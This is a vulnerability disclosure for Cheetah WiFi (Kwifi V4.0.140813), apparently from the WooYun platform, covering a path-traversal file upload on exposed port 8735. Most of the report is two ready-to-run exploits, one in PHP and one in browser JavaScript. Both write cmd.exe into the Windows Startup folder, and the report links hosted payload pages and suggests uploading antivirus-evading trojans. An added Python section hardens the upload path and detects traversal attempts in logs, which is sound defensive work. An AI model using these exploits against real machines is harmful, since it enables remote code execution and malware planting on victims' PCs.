2014-08-14: Details reported to the vendor, awaiting vendor handling
2014-08-14: Vendor confirmed; details disclosed to the vendor only
2014-10-08: Details disclosed to core white hats and relevant domain experts
2014-10-18: Details disclosed to regular white hats
2014-10-28: Details disclosed to intern white hats
2014-11-12: Vendor has fixed the vulnerability and disclosed it voluntarily; details disclosed to the public
Lightning or not?
Vulnerable program: Kwifi V4.0.140813 (latest version of Cheetah WiFi / 猎豹wifi)
Test environment: Windows 7 64-bit, Kwifi V4.0.140813, Firefox 31.0, Chrome 36.0.1985.143 m
Vulnerability details: when Cheetah WiFi is running it opens port 8735 to the external network (a web service), and one of its interfaces has a flaw that allows arbitrary file upload, which leads to compromise of the PC.
http://target:8735/tool/#upload
http://target:8735/api/replypic has the arbitrary file upload vulnerability.
Impact: installed to the C drive by default; the flaw can be used to plant malware, carry out targeted intrusions, extend into large enterprise intranets to monitor PCs, and so on. Some test environments install to the D drive by default (this occurred when WooYun staff tested; in my own tests, both the latest version from the official site and the copy downloaded from Baidu installed to the C drive).
When Kwifi is reachable from the external network:
```php
<?php
/**
 * Created by itleaf
 * Date: 2014-08-14
 * Name: Kwifi V4.0.140813 Remote File Upload Exploit
 * Blog: http://itleaf.duapp.com
 **/
function getIP()
{
    if (isset($_SERVER)) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $realip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $realip = $_SERVER['REMOTE_ADDR'];
        }
    } else {
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    return $realip;
}

$ip = $_GET["ip"];
$ch = curl_init();
$post = array('filename' => '@' . realpath('cmd.exe')); // POST body
$url = "http://" . $ip . ":8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088"; // upload address
// $url = "http://" . getIP() . ":8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088"; // upload address
curl_setopt($ch, CURLOPT_URL, $url); // URL
curl_setopt($ch, CURLOPT_REFERER, "http://" . $ip . ":8735/tool/");
curl_setopt($ch, CURLOPT_POST, 1); // simulate POST
curl_setopt($ch, CURLOPT_POSTFIELDS, $post); // POST content
curl_exec($ch);
curl_close($ch);
// echo getIP();
?>
```
When Kwifi is on an internal network (works in Firefox and Google Chrome):
```html
<!DOCTYPE html>
<html>
<head>
  <title>Kwifi Remote File Upload Exploit</title>
  <meta charset=utf-8 />
  <link href='css.css' rel='stylesheet' type='text/css'>
  <script src="jquery.min.js" type="text/javascript"></script>
  <style>
    body {background: #333; color: #eee; font-family: 'Inconsolata', Verdana, sans-serif;}
    a:link {color: green; }
    a:visited {color: darkgreen;}
  </style>
</head>
<body>
<h1>Kwifi V4.0.140813 Remote File Upload Exploit</h1>
<!--
<h2>Step 2</h2>
<button type="button" id="upload" onclick="start()"><font size="+2">Let's have some fun!</font></button>
-->
<script>
var logUrl = 'http://192.168.1.103:8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088';

function byteValue(x) {
  return x.charCodeAt(0) & 0xff;
}

function toBytes(datastr) {
  var ords = Array.prototype.map.call(datastr, byteValue);
  var ui8a = new Uint8Array(ords);
  return ui8a.buffer;
}

if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
  XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
    this.send(toBytes(datastr));
  }
}

function fileUpload(fileData, fileName) {
  var fileSize = fileData.length,
      boundary = "9849436581144108930470211272",
      uri = logUrl,
      xhr = new XMLHttpRequest();
  var fileFieldName = "filedata";
  xhr.open("POST", uri, true);
  xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary); // simulate a file MIME POST request.
  xhr.setRequestHeader("Content-Length", fileSize);
  xhr.withCredentials = "true";
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4) {
      if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
        if (xhr.responseText != "") {
          alert(JSON.parse(xhr.responseText).msg); // display response.
        }
      } else if (xhr.status == 0) {
        $("#goto").show();
      }
    }
  }
  var body = "";
  body += addFileField(fileFieldName, fileData, fileName, boundary);
  body += "--" + boundary + "--";
  xhr.sendAsBinary(body);
  return true;
}

function addField(name, value, boundary) {
  var c = "--" + boundary + "\r\n"
  c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
  c += value + "\r\n";
  return c;
}

function addFileField(name, value, filename, boundary) {
  var c = "--" + boundary + "\r\n"
  c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
  c += "Content-Type: application/octet-stream\r\n\r\n";
  c += value + "\r\n";
  return c;
}

function load_binary_resource(url) {
  var req = new XMLHttpRequest();
  req.open('GET', url, false);
  // XHR binary charset opt by Marcus Granado 2006 [http://mgran.blogspot.com]
  req.overrideMimeType('text/plain; charset=x-user-defined');
  req.send(null);
  if (req.status != 200) return '';
  var bytes = Array.prototype.map.call(req.responseText, byteValue);
  try {
    return String.fromCharCode.apply(this, bytes);
  } catch (e) {
    return req.responseText;
  }
}

var start = function() {
  var c = load_binary_resource('cmd.exe');
  fileUpload(c, 'cmd.exe');
};
start();
</script>
<div id="goto" style="display:none">
  <h2>Well Done</h2>
</div>
</body>
</html>
```
Video: http://qin1u.qiniudn.com/kwifi.wmv
The demo drops a cmd; uploading a trojan that gets past Kingsoft etc. also works~
Below is a generic test payload:
If it is installed to the C drive, enable WiFi and visit the following link to install cmd.exe into the system startup folder: http://xssae.sinaapp.com/kwifi/2.html
If it is installed to the D drive, enable WiFi and visit the following link to install cmd.exe to the D drive root: http://xssae.sinaapp.com/kwifi/3.html
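The root cause above is an upload endpoint that writes to whatever path the client puts in `name`. As an added, defender-side example that is not part of the report or of Kwifi's own code, the block below shows a hardened resolver for such a `name` parameter (reject separators, drive letters and dot segments, allow-list the extension, verify containment) and a detector that flags `/api/replypic` requests in access logs which that resolver would refuse; `UPLOAD_ROOT`, `ALLOWED_EXT`, the function names and the log-line format are assumptions.

```python
"""Defender-side checks for the /api/replypic issue in the report above (added example,
not the report's or Kwifi's code; UPLOAD_ROOT, ALLOWED_EXT and log format are assumed)."""
from pathlib import Path, PureWindowsPath
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

UPLOAD_ROOT = Path("uploads") / "replypic"      # assumed upload directory
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}  # a "reply picture" API should take images only

def safe_upload_path(name: str, root: Path = UPLOAD_ROOT) -> Optional[Path]:
    """Map the client-supplied `name` to a path inside `root`, or None if unsafe.
    The vulnerable service used `name` verbatim, so '..' segments walked it out of the
    upload directory into the Startup folder; here such names are rejected outright."""
    if "\x00" in name:
        return None
    base = PureWindowsPath(name).name            # strips drive letters, '/' and '\' segments
    if base != name or base in ("", ".", "..") or PureWindowsPath(base).suffix.lower() not in ALLOWED_EXT:
        return None                              # any separator, dot segment or odd extension
    root_abs = root.resolve()
    target = (root_abs / base).resolve()
    if target.parent != root_abs:                # containment check, in case of symlinks
        return None
    return target

# Constructed access-log lines (method, request target, status); not real Kwifi logs.
SAMPLE_LOG = [
    "POST /api/replypic?name=avatar.png&size=2048 200",
    "POST /api/replypic?name=../../../../../../ProgramData/Microsoft/Windows"
    "/Start%20Menu/Programs/Startup/cmd.exe&size=345088 200",
    "GET /tool/ 200",
    "POST /api/replypic?name=..%5C..%5Cshell.exe&size=10 200",
]

def flag_replypic_requests(lines: List[str]) -> List[str]:
    """Return the decoded `name` of each /api/replypic request the hardened resolver
    would reject; useful for hunting past exploitation attempts in access logs."""
    flagged = []
    for line in lines:
        fields = line.split()
        if len(fields) < 2 or not fields[1].startswith("/api/replypic"):
            continue
        query = parse_qs(urlsplit(fields[1]).query)  # parse_qs percent-decodes values
        name = query.get("name", [""])[0]
        if safe_upload_path(name) is None:
            flagged.append(name)
    return flagged
```

Beyond the fix itself, the service should bind its web port to the loopback or LAN-side interface only rather than exposing 8735 to the external network as the report describes.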
Severity: High
Vulnerability Rank: 15
Confirmed: 2014-08-14 19:53
Thank you very much for your submission
2014-11-12: Fixed
2014-11-12: Vulnerability has been fixed